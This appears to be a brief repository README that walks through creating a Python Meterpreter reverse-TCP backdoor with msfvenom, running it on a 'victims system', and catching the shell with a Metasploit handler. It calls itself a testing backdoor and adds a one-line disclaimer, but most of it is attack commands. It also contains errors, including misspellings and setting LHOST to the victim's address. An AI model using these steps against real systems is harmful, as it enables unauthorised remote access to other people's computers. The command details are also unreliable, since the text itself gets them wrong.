/Metaexploit-Attack

This is Client-Server testing blackdoor. Don't use it for hacking stuff

Payload Creation

Installation

Msfvenom —payload=python/meterpreter/reverse_tcp LHOST=VICTIMS_IP LPORT=4444 —out=meterpreter.py

Run Payload at victims system

To run the payload at victims side

python meterpreter.py

Open hackers System

>use exploit/multi/handler 
Enter
>set PAYLOAD python/metepreter/reverse_tcp
Enter
>set LHOST 
Enter
>set LPORT
Enter
>exploit 
To run and access the system